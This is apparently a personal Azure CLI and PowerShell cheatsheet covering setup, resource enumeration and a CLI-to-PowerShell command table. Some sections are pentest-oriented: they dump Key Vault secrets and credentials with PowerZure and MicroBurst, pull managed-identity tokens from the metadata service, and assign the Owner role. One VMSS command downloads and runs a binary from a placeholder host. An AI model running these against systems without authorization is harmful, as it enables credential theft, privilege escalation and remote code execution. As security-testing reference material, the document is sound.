# Azure - Cheatsheet Original Article - https://wiki.mutschlerhome.com/en/CheatSheets/AzureCheatsheet # Powershell Installation and Modules # Install latest version of Azure CLI on Mac ```powershell brew update && brew install azure-cli ``` [Original Article](https://wikipedia.mutschlerhome.com/attachments/31) # Install latest version of Azure CLI on Linux ``` # YOLO curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash ``` Resources: [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt) [https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0) # Install PowerShell ``` brew install --cask powershell-preview ``` Run a powershell terminal with: ``` pwsh-preview ``` # Update Powershell ```powershell brew update brew upgrade powershell-preview --cask ``` # Uninstall Powershell ``` brew uninstall --cask powershell sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell ``` Resource: [https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1](https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1) # Install Azure PowerShell module For the current user: ``` if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) { Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' + 'Az modules installed at the same time is not supported.') } else { Install-Module -Name Az -AllowClobber -Scope CurrentUser } ``` Resource: [https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0) # Setup the AzureRMAlias module This will deal with incompatibilities with older scripts that use AzureRM: ``` Enable-AzureRmAlias ``` # List available modules ```powershell Get-Module -ListAvailable ``` # Get authenticated in Powershell ```powershell Connect-AzAccount %USERNAME ``` # List commands in a module ```powershell Get-Command -Module ``` # List functions in a module ```powershell Get-Command -Module -Type Function ``` # Authenticate via the CLI Run this command to get authenticated: ``` az login ``` This will result in a web browser opening, or a URL prompt. Navigating to this url will prompt you for a code, which you’ve been provided in the command line. Paste it in, click next, and select the proper account. Resource: [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos) # Info Gathering # List subscriptions for authenticated account ```powershell az account list ``` # Get tenant id ```powershell az account list | jq '.[].tenantId' ``` # Get subscription id **az cli:** ``` az account list | jq '.[].id' ``` **Powershell:** ``` Get-AzSubscription ``` Resources: [Powershell docs](https://docs.microsoft.com/en-us/powershell/module/az.accounts/get-azsubscription?view=azps-5.5.0) [ClI docs](https://docs.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest) # List tenants ```powershell az account tenant list ``` # List Resource Groups by name ``` az group list | jq -r '.[].name' ``` Resource: [https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest) # Set Subscription **az cli:** ``` az account set -s ``` **Powershell:** ``` Set-AzureSubscription -Id [Subscription ID] ``` Resources: [https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html](https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html) [https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default](https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default) # List all VMs ``` az vm list ``` Resource: [https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest) # Blob Storage # General List all storage accounts and output in a table format: ``` az storage account list -o table ``` List all storage accounts and get storage account names: ``` az storage account list -o json | jq -r '.[].name' ``` You can assign one of the account names to an env var if you’d like: ``` export AZURE_STORAGE_ACCOUNT= ``` # Get storage keys If you set the env var: ``` az storage account keys list -n $AZURE_STORAGE_ACCOUNT ``` You can assign one of the keys to an env var if you’d like: ``` export AZURE_STORAGE_KEY='' ``` # List storage containers ```powershell az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY" ``` # List storage container contents ``` az storage blob list --container-name --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY ``` Resource: [https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/](https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/) # List blob names ```powershell az storage blob list --container-name --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name' ``` # Azure Kubernetes (k8s) # Get available versions of k8s in a region ``` REGION=westus2 # This will vary depending on the region you're using az aks get-versions --location $REGION -o table ``` Resource: [https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet](https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet) # List managed k8s clusters ``` az aks list ``` Resource: [https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest) # Get Resource Group Name for clusters ```powershell AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup') ``` # Get Cluster Name ```powershell AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name') ``` # Configure kubectl This is pretty awesome, good job Microsoft: ``` az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME ``` Resources: [https://www.reddit.com/r/kubernetes/comments/8ohxcz/how\_to\_connect\_kubectl\_to\_aks/](https://www.reddit.com/r/kubernetes/comments/8ohxcz/how_to_connect_kubectl_to_aks/) [https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster](https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster) # Security Auditing # ScoutSuite [https://github.com/nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite) will generate an HTML report outlining various issues that exist in the configuration for a given account. **Install:** ``` git clone git@github.com:nccgroup/ScoutSuite.git cd ScoutSuite pipenv --python 3 pipenv shell pip install -r requirements.txt ``` **Run:** ``` python scout.py azure --cli ``` Resources: [https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/](https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/) # PowerZure ``` git clone git@github.com:hausec/PowerZure.git cd PowerZure pwsh-preview # Authenticate Connect-AzAccount # Import PowerZure # impo is shorthand for Import-Module ipmo ./PowerZure.ps1 # If you have multiple subscriptions, set the one you want to target: Set-AzureSubscription -Id [Subscription ID] # Enumerate all roles Get-AzureRole # Enumerate resources the current user has access to Get-AzureTargets # Show info about current user Show-AzureCurrentUser ``` Resources: [https://powerzure.readthedocs.io/en/latest/](https://powerzure.readthedocs.io/en/latest/) [Fix error when importing AzureADPreview](https://stackoverflow.com/questions/64792108/getting-error-could-not-load-file-or-assembly-system-windows-forms-at-import) [Fix missing modules](https://github.com/Azure/azure-docs-powershell-azuread/issues/189) #### Show all functions ``` powerzure -h ``` # Get help for a particular function For example: ``` get-help Get-AzureTargets ``` # Get all content from all KeyVault ``` Show-AzureKeyVaultContent -All ``` Resource: [https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/](https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/) # MicroBurst ``` git clone git@github.com:NetSPI/MicroBurst.git cd MicroBurst pwsh-preview # Authenticate Connect-AzAccount # Import MicroBurst ipmo ./MicroBurst.psm1 # Install module for Out-GridView Install-Module Microsoft.PowerShell.GraphicalTools # Show commands Get-Command -Module MicroBurst # Dump info from an Azure subscription **Note:** Be sure to click a row in the pop up before clicking **Export** Get-AzDomainInfo -folder MicroBurst -Verbose # Look for creds or certificate stores in a number of places and dump them to `secrets.txt` **Note:** Be sure to click a row in the pop up before clicking **Export** Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt # Dump Key Vault Keys and Secrets from an Azure subscription # via Automation Accounts specifically **Note:** Be sure to click a row in the pop up before clicking **Export** Get-AzKeyVaultsAutomation -Verbose ``` Resources: [Where I found out about the tool initially](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) [Write output to a file](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/out-file?view=powershell-7.1) # SkyArk ``` git clone https://github.com/cyberark/SkyArk cd SkyArk pwsh-preview Import-Module .\SkyArk.ps1 -force Start-AzureStealth ``` Resource: [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) # Create Azure Objects # Create a new user ```powershell New-AzureUser -Username 'test@test.com' -Password reallyAwesomePassword123! ``` # Azure AD # List all applications ```powershell az ad app list --output=table --query='[].{Name:displayName,URL:homepage}' ``` # List all service principles ```powershell az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}' ``` # List all groups ``` az ad group list --output=json --query='[].{Group:displayName,Description:description}' ``` Resource: [https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/](https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/) # VMSS # View all VMSS in a subscription Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat! ## CLI ``` az vmss list ``` # Get VMSS by name and associated resource group ```powershell az vmss list | jq '.[].name, .[].resourceGroup' ``` # List vms in a VMSS ``` az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP ``` Resource: [https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest) [https://github.com/andyt530/az2tf/blob/master/scripts/295\_azurerm\_virtual\_machine\_scale\_set.sh](https://github.com/andyt530/az2tf/blob/master/scripts/295_azurerm_virtual_machine_scale_set.sh) # Get computer name of vms in a VMSS ```powershell az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName' ``` # Run command in VM in a VMSS This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with. ``` az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $1' --parameters hello world ``` Run whoami: ``` az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami' ``` Run download and run a binary as a background job: ``` az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget https://example.com/binary && chmod +x binary && ./binary &"' ``` Resources: [https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0](https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0) [Run command on a VMSS instance](https://heranonazure.wordpress.com/2017/08/30/solution-change-vm-scale-set-ssh-key/) # Metadata Service # Get all instance metadata ```powershell curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" ``` # Get access token ``` curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" ``` Resources: [Official docs](https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=linux) [Accessible endpoints](https://gist.github.com/nordineb/01d69b63d2daf01e61b116bee607c6b8) [Get access token](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) # Request storage account token ``` # Get OAuth Token TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -H Metadata:true | jq -r '.access_token') # Get subscription id SUB=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" | jq -r '.compute.subscriptionId') # Get list of storage accounts curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01" ``` Resource: [Powershell script I used](https://gist.github.com/kfosaaen/2620f73690d2948efb2a31897e1f404e) # Get AKS node IP ``` curl -s -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2017-08-01" | jq -r .network.interface[].ipv4.ipAddress[].privateIpAddress ``` Resource: [https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811](https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811) # Roles # Create new role assignment This will try to assign the assignee the owner role: ``` az role assignment create --assignee --role "owner" ``` Resource: [https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/](https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/) # Features # Show registered features in a table format ```powershell az feature list -o table ``` # Find features associated w/ ContainerService ``` az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}" ``` Resource: [https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/](https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/) # Azure Powershell Module Cheatsheet
\#Azure ProductAzure CLIExample CLIPowerShell ModuleExample PS
1Syntaxaz PowerShell uses a verb-noun pair for the names of cmdlets
2Log in to Azure[az login](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login)az login -u -p VerySecret[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)Connect-AzAccount
3Manage Azure subscription information[az account](https://docs.microsoft.com/en-us/cli/azure/account)az account list --o table[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)Get-AzSubscription
4Manage private registries with Azure Container Registries[az acr](https://docs.microsoft.com/en-us/cli/azure/acr?view=azure-cli-latest)az acr list -g MyResourceGroup -o table[Az.ContainerRegistry](https://docs.microsoft.com/en-us/powershell/module/az.containerregistry/?view=azps-4.3.0#container_registry)Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup"
5Manage Azure Container Services[az acs](https://docs.microsoft.com/en-us/cli/azure/acs?view=azure-cli-lates)az acs list-locations --subscription[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#container_service?)Get-AzContainerService -ResourceGroupName "myRG"
6Manage Azure Active Directory[az ad](https://docs.microsoft.com/en-us/cli/azure/ad?view=azure-cli-latest)az ad group show --group[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#active_directory)Get-AzADGroup -First 100
7Manage Azure Advisor[az advisor](https://docs.microsoft.com/en-us/cli/azure/advisor?view=azure-cli-latest)az advisor recommendation list --category Performance[Az.Advisor](https://docs.microsoft.com/en-us/powershell/module/az.advisor/get-azadvisorrecommendation?view=azps-4.4.0)Get-AzAdvisorRecommendation -Category Performance
8Manage Azure Kubernetes Services[az aks](https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest)az aks get-versions --location westus2[Az.Aks](https://docs.microsoft.com/en-us/powershell/module/az.aks/get-azaksversion?view=azps-4.4.0)Get-AzAksVersion -Location westus
9Manage Azure Media Services resources[az ams](https://docs.microsoft.com/en-us/cli/azure/ams?view=azure-cli-latest)az ams account list --resource-group --subscription[Az.Media](https://docs.microsoft.com/en-us/powershell/module/az.media/Get-AzMediaService?view=azps-4.4.0)Get-AzMediaService -ResourceGroupName "myRG"
10Manage App Configurations[az appconfig](https://docs.microsoft.com/en-us/cli/azure/appconfig?view=azure-cli-latest)az appconfig list -g MyResourceGroup[Az.AppConfiguration](https://docs.microsoft.com/en-us/powershell/module/az.appconfiguration/?view=azps-4.4.0#app_configuration)Get-AzAppConfigurationStore
11Manage App Service plans[az appservice](https://docs.microsoft.com/en-us/cli/azure/appservice?view=azure-cli-latest)az appservice ase list[Az.Websites](https://docs.microsoft.com/en-us/powershell/module/az.websites/get-azappserviceplan?view=azps-4.4.0)Get-AzAppServicePlan -Location "West US"
12Manage Azure Backups[az backup](https://docs.microsoft.com/en-us/cli/azure/backup?view=azure-cli-latest)az backup container show..[Az.RecoveryServices](https://docs.microsoft.com/en-us/powershell/module/az.recoveryservices/?view=azps-4.4.0#recovery_services)Get-AzRecoveryServicesBackupJob
13Manage Azure Batch[az batch](https://docs.microsoft.com/en-us/cli/azure/batch?view=azure-cli-latest)az batch account list \[--resource-group\] \[--subscription\][Az.Batch](https://docs.microsoft.com/en-us/powershell/module/az.batch/?view=azps-4.4.0#batch)Get-AzBatchAccount -AccountName "pfuller"
14Manage Azure Billing[az billing](https://docs.microsoft.com/en-us/cli/azure/billing?view=azure-cli-latest)az billing period show --name --subscription[Az.Billing](https://docs.microsoft.com/en-us/powershell/module/az.billing/?view=azps-4.4.0#billing)Get-AzBillingInvoice -Latest
15Manage Azure Content Delivery Networks[az cdn](https://docs.microsoft.com/en-us/cli/azure/cdn?view=azure-cli-latest)az cdn origin list[Az.Cdn](https://docs.microsoft.com/en-us/powershell/module/az.cdn/?view=azps-4.4.0#cdn)Get-AzCdnOrigin
16Manage Azure Cognitive Services accounts[az cognitiveservices](https://docs.microsoft.com/en-us/cli/azure/cognitiveservices?view=azure-cli-latest)az cognitiveservices account list -g MyResourceGroup[Az.CognitiveServices](https://docs.microsoft.com/en-us/powershell/module/az.cognitiveservices/?view=azps-4.4.0#cognitive_services)Get-AzCognitiveServicesAccount
17Manage Azure CLI configuration[az configure](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-configure)az configure --defaults group=myRG web=myweb vm=myvm[Az.Accounts](https://learn.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-9.6.0&viewFallbackFrom=azps-4.3.0#accounts)Set-AzContext -SubscriptionId "xxxx-xxxx-xxxx-xxxx"
18Manage Azure Container Instances.[az container](https://docs.microsoft.com/en-us/cli/azure/container?view=azure-cli-latest)az container logs --name MyContainerGroup --resource-group MyResourceGroup[Az.ContainerInstance](https://docs.microsoft.com/en-us/powershell/module/az.containerinstance/?view=azps-4.4.0#container_instances)Get-AzContainerGroup -ResourceGroupName demo -Name mycontainer
19Manage Azure Cosmos DB database[az cosmosdb](https://docs.microsoft.com/en-us/cli/azure/cosmosdb?view=azure-cli-latest)az cosmosdb list \[--resource-group\] \[--subscription\][Az.CosmosDB](https://docs.microsoft.com/en-us/powershell/module/az.cosmosdb/?view=azps-4.4.0#cosmos_db)Get-AzCosmosDBAccount -ResourceGroupName {resourceGroupName} -Name
20Manage ARM template deployment at subscription scope[az deployment](https://docs.microsoft.com/en-us/cli/azure/deployment?view=azure-cli-latest)az deployment group list -g testrg[Az.DeploymentManager](https://docs.microsoft.com/en-us/powershell/module/az.deploymentmanager/?view=azps-4.4.0#deployment_manager)Get-AzDeploymentManagerArtifactSource -InputObject $artifactSourceObject
21Manage Azure Managed Disks[az disk](https://docs.microsoft.com/en-us/cli/azure/disk?view=azure-cli-latest)az disk list \[--resource-group\] \[--subscription\][Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#vm_disks)Get-AzDisk -ResourceGroupName 'ResourceGroup01' -DiskName 'Disk01'
22Manage Data Lake Analytics[az dla](https://docs.microsoft.com/en-us/cli/azure/dla?view=azure-cli-latest)az dla account list \[--resource-group\] \[--subscription\][Az.DataLakeAnalytics](https://docs.microsoft.com/en-us/powershell/module/az.datalakeanalytics/?view=azps-4.4.0#data_lake_analytics)Get-AzDataLakeAnalyticsAccount -Name "ContosoAdlAccount"
23Manage Data Lake Store[az dls](https://docs.microsoft.com/en-us/cli/azure/dls?view=azure-cli-latest)az dls account list --resource-group myRG[Az.DataLakeStore](https://docs.microsoft.com/en-us/powershell/module/az.datalakestore/?view=azps-4.4.0#data_lake_store)Get-AzDataLakeStoreAccount -Name "ContosoADL"
24Manage Azure Data Migration Service[az dms](https://docs.microsoft.com/en-us/cli/azure/dms?view=azure-cli-latest)az dms check-name --location westus2 --name MyService[Az.DataMigration](https://docs.microsoft.com/en-us/powershell/module/az.datamigration/?view=azps-4.4.0#data_migration)Get-AzDataMigrationProject -InputObject $myService
25Manage Azure Event Grid[az eventgrid](https://docs.microsoft.com/en-us/cli/azure/eventgrid?view=azure-cli-latest)Get-AzEventGridDomain -ResourceGroup myRG -Name Domain1[Az.EventGrid](https://docs.microsoft.com/en-us/powershell/module/az.eventgrid/?view=azps-4.4.0#event_grid)az ams account list --resource-group --subscription
26Manage Azure Event Hubs[az eventhubs](https://docs.microsoft.com/en-us/cli/azure/eventhubs?view=azure-cli-latest)az eventhubs eventhub list --resource-group myRG --namespace-name mynamespace[Az.EventHub](https://docs.microsoft.com/en-us/powershell/module/az.eventhub/?view=azps-4.4.0#event_hub)Get-AzEventHub -ResourceGroup myRG -NamespaceName MyNamespaceName
27Manage resource provider features[az feature](https://docs.microsoft.com/en-us/cli/azure/feature?view=azure-cli-latest)az feature list[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/register-azresourceprovider?view=azps-4.4.0)Register-AzResourceProvider -ProviderNamespace Microsoft.Network
28Find commands[az find](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-find)az find "az storage"[Az.Accounts](https://docs.microsoft.com/en-us/powershell/module/az.accounts/?view=azps-4.3.0#accounts)Get-Command -Verb Get -Noun AzVM\* -Module Az.Compute
29Manage function apps[az functionapp](https://docs.microsoft.com/en-us/cli/azure/functionapp?view=azure-cli-latest)az functionapp list --query "\[?state=='Running'\]"[Az.Functions](https://docs.microsoft.com/en-us/powershell/module/az.functions/?view=azps-4.4.0#functions)Get-AzFunctionApp
30Manage resource groups and template deployments[az group](https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest)az group create -l westus -n myRG[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/register-azresourceprovider?view=azps-4.4.0)Get-AzResourceGroup -Name "EngineerBlog"
31Manage HDInsight resources.[az hdinsight](https://docs.microsoft.com/en-us/cli/azure/hdinsight?view=azure-cli-latest)az hdinsight list \[--resource-group\] \[--subscription\][Az.HDInsight](https://docs.microsoft.com/en-us/powershell/module/az.hdinsight/?view=azps-4.4.0#hdinsight)Get-AzHDInsightCluster
32Managed Service Identities.[az identity](https://docs.microsoft.com/en-us/cli/azure/identity?view=azure-cli-latest)az identity list-operations \[--subscription\][Az.ManagedServiceIdentity](https://docs.microsoft.com/en-us/powershell/module/az.managedserviceidentity/?view=azps-4.4.0#managed_service_identity)Get-AzUserAssignedIdentity -ResourceGroupName PSRG -Name ID1
33Manage custom virtual machine images.[az image](https://docs.microsoft.com/en-us/cli/azure/image?view=azure-cli-latest)az image builder show --name mytemplate --resource-group my-group[Az.ManagedServiceIdentity](https://docs.microsoft.com/en-us/powershell/module/az.imagebuilder/?view=azps-4.4.0#vm_images)Get-AzImageBuilderTemplate
34Manage KeyVault[az keyvault](https://docs.microsoft.com/en-us/cli/azure/keyvault?view=azure-cli-latest)az keyvault list \[--resource-group\] \[--subscription\][Az.KeyVault](https://docs.microsoft.com/en-us/powershell/module/az.keyvault/?view=azps-4.4.0#key_vault)Get-AzKeyVault
35Manage Azure Kusto resources[az kusto](https://docs.microsoft.com/en-us/cli/azure/kusto?view=azure-cli-latest)az kusto cluster list --resource-group myRG[Az.Kusto](https://docs.microsoft.com/en-us/powershell/module/az.kusto/?view=azps-4.4.0#kusto)Get-AzKustoCluster -ResourceGroupName testrg
36Manage Azure locks[az lock](https://docs.microsoft.com/en-us/cli/azure/lock?view=azure-cli-latest)az lock list[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/get-azresourcelock?view=azps-4.4.0)Get-AzResourceLock -ResourceGroupName "myRG" -AtScope
37Manage assignments and definitions[az managedservices](https://docs.microsoft.com/en-us/cli/azure/managedservices?view=azure-cli-latest)az managedservices definition list[Az.ManagedServices](https://docs.microsoft.com/en-us/powershell/module/az.managedservices/?view=azps-4.4.0#managed_services)Get-AzManagedServicesAssignment
38Manage Azure Maps[az maps](https://docs.microsoft.com/en-us/cli/azure/maps?view=azure-cli-latest)az maps account show --name MyMapsAccount --resource-group myRG[Az.Maps](https://docs.microsoft.com/en-us/powershell/module/az.maps/?view=azps-4.4.0#maps)Get-AzMapsAccount -ResourceGroupName myRG
39Manage Azure Database for MariaDB servers[az mariadb](https://docs.microsoft.com/en-us/cli/azure/mariadb?view=azure-cli-latest)az mariadb db list -g testgroup -s testsvr[Az.MariaDb](https://docs.microsoft.com/en-us/powershell/module/az.mariadb/?view=azps-4.4.0#database_for_mariadb)Get-AzMariaDbServer
40Manage the Azure Monitor Service.[az monitor](https://docs.microsoft.com/en-us/cli/azure/monitor?view=azure-cli-latest)az monitor action-group list \[--resource-group\] \[--subscription\][Az.Monitor](https://docs.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-3.8.0#monitor)Get-AzActionGroup
41Manage Azure Database for MySQL servers.[az mysql](https://docs.microsoft.com/en-us/cli/azure/mysql?view=azure-cli-latest)az mysql db list -g testgroup -s testsvr[Az.MySql](https://docs.microsoft.com/en-us/powershell/module/az.mysql/?view=azps-4.4.0#database_for_mysql)Get-AzMySqlServer
42Manage Azure Network resources.[az network](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest)az network nic list --query "\[?dnsSettings.internalDomainNameSuffix=`{dnsSuffix}`\]"[Az.Network](https://docs.microsoft.com/en-us/powershell/module/az.network/?view=azps-4.4.0#networking)Get-AzNetworkInterface
43Manage resource policies.[az policy](https://docs.microsoft.com/en-us/cli/azure/policy?view=azure-cli-latest)az policy definition show --name MyPolicyDefinition[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#policies)Get-AzPolicyDefinition
44Manage Azure Database for PostgreSQL servers.[az postgres](https://docs.microsoft.com/en-us/cli/azure/postgres?view=azure-cli-latest)az postgres db list -g testgroup -s testsvr[Az.PostgreSql](https://docs.microsoft.com/en-us/powershell/module/az.postgresql/?view=azps-4.4.0#database_for_postgresql)Get-AzPostgreSqlServer
45Manage dedicated Redis caches for your Azure applications.[az redis](https://docs.microsoft.com/en-us/cli/azure/redis?view=azure-cli-latest)az redis list \[--resource-group\] \[--subscription\][Az.RedisCache](https://docs.microsoft.com/en-us/powershell/module/az.rediscache/?view=azps-4.4.0#redis_cache)Get-AzRedisCache -Name "myexists"
46Manage Azure Reservations[az reservations](https://docs.microsoft.com/en-us/cli/azure/reservations?view=azure-cli-latest)az reservations reservation list --reservation-order-id \[--subscription\][Az.Reservations](https://docs.microsoft.com/en-us/powershell/module/az.reservations/?view=azps-4.4.0#reservations)Get-AzReservation -ReservationOrderId "1111aaaa"
47Manage Azure resources.[az resource](https://docs.microsoft.com/en-us/cli/azure/resource?view=azure-cli-latest)az resource list --location westus[Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/?view=azps-4.4.0#resources)Get-AzResource | ft
48Manage user roles for access control with AAD and service principals[az role](https://docs.microsoft.com/en-us/cli/azure/role?view=azure-cli-latest)az role assignment list \[--all\][Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.resources/get-azadserviceprincipal?view=azps-4.4.0)Get-AzADServicePrincipal
49Manage Azure Search services[az search](https://docs.microsoft.com/en-us/cli/azure/search?view=azure-cli-latestt)az search service list --resource-group \[--subscription\][Az.Search](https://docs.microsoft.com/en-us/powershell/module/az.search/?view=azps-4.4.0#search)Get-AzSearchService -ResourceGroupName felixwa-01
50Manage security with Azure Security Center[az security](https://docs.microsoft.com/en-us/cli/azure/security?view=azure-cli-latest)az security alert list[Az.Security](https://docs.microsoft.com/en-us/powershell/module/az.security/?view=azps-4.4.0#security%22)Get-AzDiscoveredSecuritySolution
51Manage shared image gallery[az sig](https://docs.microsoft.com/en-us/cli/azure/sig?view=azure-cli-latest)az sig list \[--resource-group\] \[--subscription\][Az.ImageBuilder](https://docs.microsoft.com/en-us/powershell/module/az.imagebuilder/?view=azps-4.4.0#vm_images)Get-AzImageBuilderTemplate
52Manage snapshots[az snapshot](https://docs.microsoft.com/en-us/cli/azure/snapshot?view=azure-cli-latest)az snapshot list \[--resource-group\] \[--subscription\][Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/Get-AzSnapshot?view=azps-4.4.0%22)Get-AzSnapshot
53Manage Azure SQL Databases and Data Warehouses.[az sql](https://docs.microsoft.com/en-us/cli/azure/sql)az sql db list --resource-group myRG --server myserver[Az.Sql](https://docs.microsoft.com/en-us/powershell/module/az.sql/get-azsqldatabase)Get-AzSqlDatabase -ResourceGroupName "myRG" -ServerName "server01"
54Manage Azure Storage resources[az storage](https://docs.microsoft.com/en-us/cli/azure/storage)az storage account list -g myRG\][Az.Storage](https://docs.microsoft.com/en-us/powershell/module/az.storage/?view=azps-4.4.0#storage)Get-AzStorageAccount -ResourceGroupName "RG01"
55Manage resource tags[az tag](https://docs.microsoft.com/en-us/cli/azure/tag)az tag list \[--subscription\][Az.Resources](https://docs.microsoft.com/en-us/powershell/module/az.accounts/Get-AzSubscription)Get-AzTag -Name "Department"
